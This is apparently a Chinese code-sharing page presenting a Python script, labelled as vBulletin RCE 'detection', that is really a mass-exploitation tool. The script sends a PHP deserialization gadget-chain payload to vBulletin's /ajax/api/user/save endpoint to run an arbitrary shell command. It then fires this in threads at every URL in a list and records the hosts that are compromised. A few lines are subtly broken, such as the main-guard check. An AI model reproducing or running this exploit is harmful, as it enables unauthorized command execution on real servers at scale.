利用多线程加速 vBulletin RCE 漏洞检测

{ "title": "利用多线程加速 vBulletin RCE 漏洞检测", "description": "本代码使用多线程技术加速 vBulletin RCE 漏洞检测，可以有效提高检测效率，并提供详细的代码实现和使用说明。", "keywords": "vBulletin RCE, 漏洞检测, 多线程, Python, 代码", "content": "import\x20random\nimport\x20re\nimport\x20requests\nimport\x20string\nimport\x20sys\nimport\x20threading\n\ndef\x20exploit_vbulletin_rce(url:\x20str,\x20command:\x20str,\x20proxy:\x20str\x20=\x20None)\x20->\x20bool:\n\x20\x20def\x20random_string(length):\n\x20\x20\x20\x20return\x20''.join(random.choice(string.ascii_letters)\x20for\x20_\x20in\x20range(length))\n\n\x20\x20session\x20=\x20requests.Session()\n\n\x20\x20if\x20proxy:\n\x20\x20\x20\x20session.proxies\x20=\x20proxy\n\n\x20\x20marker\x20=\x20"RANDOM_MARKER"\n\x20\x20command\x20=\x20f"echo\x20{marker}::;\x20{command};\x20echo\x20::{marker}"\n\x20\x20command\x20=\x20command.encode()\n\x20\x20payload\x20=\x20(\n\x20\x20\x20\x20b'a:2:{i:0;O:27:"googlelogin_vendor_autoload":0:{}i:1;O:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"\x00*\x00socket";O:29:"Monolog\Handler\BufferHandler":7:{s:10:"\x00*\x00handler";r:4;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;s:[LEN]:"[COMMAND]";s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}}'\n\x20\x20)\n\x20\x20payload\x20=\x20payload.replace(b"[LEN]",\x20str(len(command)).encode())\n\x20\x20payload\x20=\x20payload.replace(b"[COMMAND]",\x20command)\n\n\x20\x20response\x20=\x20session.post(\n\x20\x20\x20\x20url\x20+\x20"/ajax/api/user/save",\n\x20\x20\x20\x20{\n\x20\x20\x20\x20\x20\x20"adminoptions":\x20"",\n\x20\x20\x20\x20\x20\x20"options":\x20"",\n\x20\x20\x20\x20\x20\x20"password":\x20random_string(10),\n\x20\x20\x20\x20\x20\x20"securitytoken":\x20random_string(10),\n\x20\x20\x20\x20\x20\x20"user[email]":\x20"pown@pown.net",\n\x20\x20\x20\x20\x20\x20"user[password]":\x20"password",\n\x20\x20\x20\x20\x20\x20"user[searchprefs]":\x20payload,\n\x20\x20\x20\x20\x20\x20"user[username]":\x20random_string(10),\n\x20\x20\x20\x20\x20\x20"userfield":\x20"",\n\x20\x20\x20\x20\x20\x20"userid":\x20"0",\n\x20\x20\x20\x20},\n\x20\x20\x20\x20verify=False\n\x20\x20)\n\n\x20\x20if\x20response.status_code\x20!=\x20200:\n\x20\x20\x20\x20print(f"Exploit\x20failed:\x20unexpected\x20response\x20code\x20({response.status_code})")\n\x20\x20\x20\x20return\x20False\n\n\x20\x20result\x20=\x20re.search(fr"{marker}::(.)::{marker}",\x20response.text,\x20re.S)\n\x20\x20if\x20not\x20result:\n\x20\x20\x20\x20print("Exploit\x20potentially\x20failed:\x20command\x20output\x20not\x20found")\n\x20\x20\x20\x20return\x20False\n\n\x20\x20print("Exploit\x20succeeded!")\n\x20\x20print("-"\x20\x2080)\n\x20\x20print(result.group(1))\n\x20\x20print("-"\x20*\x2080)\n\n\x20\x20return\x20True\n\n\ndef\x20check_url(url,\x20command,\x20output_file):\n\x20\x20print(f"Checking\x20{url}")\n\x20\x20if\x20exploit_vbulletin_rce(url,\x20command):\n\x20\x20\x20\x20with\x20open(output_file,\x20'a')\x20as\x20out_file:\n\x20\x20\x20\x20\x20\x20out_file.write(url\x20+\x20'\n')\n\n\ndef\x20check_urls_from_file(input_file,\x20output_file,\x20command):\n\x20\x20with\x20open(input_file,\x20'r')\x20as\x20file:\n\x20\x20\x20\x20urls\x20=\x20file.readlines()\n\n\x20\x20threads\x20=\x20[]\n\x20\x20for\x20url\x20in\x20urls:\n\x20\x20\x20\x20url\x20=\x20url.strip()\n\x20\x20\x20\x20t\x20=\x20threading.Thread(target=check_url,\x20args=(url,\x20command,\x20output_file))\n\x20\x20\x20\x20threads.append(t)\n\x20\x20\x20\x20t.start()\n\n\x20\x20for\x20thread\x20in\x20threads:\n\x20\x20\x20\x20thread.join()\n\n\nif\x20__name__\x20==\x20"main":\n\x20\x20if\x20len(sys.argv)\x20!=\x203:\n\x20\x20\x20\x20print("Usage:\x20python\x20exp.py\x20-f\x20<input_file>")\n\x20\x20\x20\x20sys.exit(1)\n\n\x20\x20if\x20sys.argv[1]\x20==\x20"-f":\n\x20\x20\x20\x20input_file\x20=\x20sys.argv[2]\n\x20\x20\x20\x20command\x20=\x20"your_command_here"\x20#\x20在这里替换为你想要执行的命令\n\x20\x20\x20\x20output_file\x20=\x20"velout.txt"\n\x20\x20\x20\x20check_urls_from_file(input_file,\x20output_file,\x20command)\n\x20\x20else:\n\x20\x20\x20\x20print("Invalid\x20argument.\x20Use\x20-f\x20for\x20file\x20input.")\n\x20\x20\x20\x20sys.exit(1)